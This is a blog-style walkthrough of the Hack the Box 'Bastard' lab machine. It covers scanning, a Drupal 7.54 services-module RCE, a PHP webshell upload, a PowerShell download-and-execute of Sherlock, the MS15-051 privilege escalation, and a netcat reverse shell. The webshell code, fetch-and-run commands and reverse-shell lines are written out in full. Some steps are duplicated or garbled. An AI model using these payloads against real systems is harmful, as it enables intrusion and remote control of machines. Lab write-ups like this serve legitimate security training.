Hack the Box - Bastard - Walkthrough
Introduction
Today we're going to be doing a pentest walkthrough of the Bastard machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Bastard machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.100.109.Scanning and Enumeration
We'll start by scanning for open ports with Nmap:
sudo nmap -T4 -p- 10.129.100.109
Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:
sudo nmap -sV -T4 -p80,135,49154 10.129.100.109
There's a web server on this target, so let's take a quick look before continuing:
http://10.129.100.109
We see there's a Drupal CMS installed on this website. Drupal is notorious for its many vulnerabilities over the years. This helps us with directory busting, because we know to include php files when we run Gobuster:
gobuster dir -u http://10.129.100.109/ -w /usr/share/wordlists/dirb/big.txt -r -x php,html,txt -s 200,204,301,302,307,403,401
We'll let that run in the background while we check if there's a robots.txt file on the server:
http://10.129.100.109/robots.txt
There's a changelog file in the robots.txt file. It's a great place to look to confirm version info:
http://10.129.100.109/CHANGELOG.txt
Now that we have a good idea what version of Drupal this is, let's see if we can find an exploit for it:
Google search string: drupal 7.54 exploit
This looks promising. Let's take a look at the page:
https://www.ambionics.io/blog/drupal-services-module-rce
This article outlines an exploit that can be performed on Drupal 7.54. After a bit of research, it turns out that the exploit described in the article has a counterpart entry in our Kali Searchsploit repository:
searchsploit drupal module services
Let's copy this file to our working directory, then Gedit it to see which variables we need to change:
cp /usr/share/exploitdb/exploits/php/webapps/41564.php drupalRCE.php
gedit drupalRCE.php
To get this exploit working, we'll need to change these variables:
$url = ‘http://10.129.100.109/’;
$endpoint = ‘?????’;
$file = [???????];
If we check on the website, we find that the /rest_endpoint directory doesn't exist. However, we did get some interesting results from our Gobuster scan:
That means we can fill in the endpoint_path variables as this:
$endpoint_path = ‘/rest’;
Finally, the $file variable is going to contain the malicious webshell PHP file we want to upload to the web server. The webshell code we're using was obtained from the following URL:
https://d47zm3.me/resources/infosec/reverse-shells/
After we're done, lines 31-50 of the code look like this:
$url = 'http://10.129.100.109';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.99.99/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['fexec'])) {
echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>
EOD;
$file = [
'filename' => 'webshell.php',
'data' => $phpCode
];
The last thing to do before running this exploit is to install the php-curl program, otherwise the exploit isn't going to run properly:
sudo apt-get install php-curl
Now we're all set to run the exploit and upload our webshell to target.
php drupalRCE.php
First, let's visit the webshell and get the target's system information:
http://10.129.100.109/webshell.php?fexec=systeminfo
Some important information here is the target's OS version and architecture. If we want to run any executables on the target, we'll need to make sure they're 64-bit.
Capturing the User Flag
Since we have command execution on the target via a webshell, we can capture the User flag. User flags on Hack the Box Windows systems are usually located in a user's \Desktop directory. In this case, the user's name is dimitris:
http://10.129.100.109/webshell.php?fexec=type%20c:\users\dimitris\desktop\user.txt
Foothold Enumeration
The next thing we want to do is enumerate the system for privilege escalation vulnerabilities. To do that, we'll need to host our enumeration files in a directory, and make that directory available on an HTTP server. We'll use Python's SimpleHTTPServer module to do that:
sudo python -m SimpleHTTPServer 80
As for what files we'll use for enumeration, we'll use the Sherlock.ps1 script to check for vulnerable kernel exploits. Sherlock.ps1 can be found at the following URL:
https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1
After downloading the script to our working directory (where we started our HTTP server), we need to modify the script by adding this line to end of the script:
Find-AllVulns
Then, from the webshell, we send the following command that causes the target to use Powershell to download and import the Sherlock.ps1 script, which we've modified to Find-AllVulns when imported:
http://10.129.100.109/webshell.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.84:80/Sherlock.ps1') | powershell -noprofile -
According to Sherlock, the target is vulnerable to MS15-051. Let's check for a public exploit:
Google search string: ms15-051 exploit
Privilege Escalation
Let's follow that link:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
This looks like a suitable exploit, but we'll have to download the zip file, then unzip it, and copy the 64-bit version to our working directory:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
This looks like a suitable exploit, but we'll have to download the zip file, then unzip it, and copy the 64-bit version to our working directory:
wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/ms15-051.zip?raw=true
unzip ms15-051.zip\?raw=true zip file password: zcgonvh
cp ms15-051/ms15-051/x64/ms15-051.exe ms15-051.exe
unzip ms15-051.zip\?raw=true zip file password: zcgonvh
cp ms15-051/ms15-051/x64/ms15-051.exe ms15-051.exe
We'll also need to upload a Netcat executable to the target in order to get an reverse shell with elevated privileges. Because the target is a 64-bit system, we need to make sure the executable we upload is 64-bit as well. A 64-bit version of Netcat can be obtained from the following URL:
https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
So we download it to our working directory, unzip the file, then copy the 64-bit version to our working directory:
wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
unzip netcat-win32-1.11.zip
cp netcat-1.11/nc64.exe nc64.exe
Because our next action is opening a reverse shell to our attacking machine, we'll need to setup a Netcat listener on our attacking system now:
sudo nc -nlvp 443
And now to send the webshell command that uploads the Netcat executable and the exploit executable, runs the exploit executable, then runs the Netcat executable to open a reverse shell back to our attacking system:
http://10.129.100.109/webshell.php?fupload=nc64.exe&ms15-051.exe&fexec=ms15-051.exe “nc64.exe -e cmd 10.10.14.84 443”
whoami
Capturing the Root Flag
The Root flag on Hack the Box Windows systems is usually located in the Administrator's \Desktop directory.
type c:\users\administrator\desktop\root.txt.txt
Summary
After initial scans, we found that the target's installation of Drupal CMS was vulnerable to a remote command execution exploit via a vulnerable app module. We utilized the exploit to upload a webshell to the target server and enumerated the target remotely via the webshell. Finding that the target was insufficiently patched, we uploaded a public kernel exploit via the webshell and executed it, gaining a privileged reverse shell in the process and through that we were able to obtain our objective flag files.
Finish
Comments
Post a Comment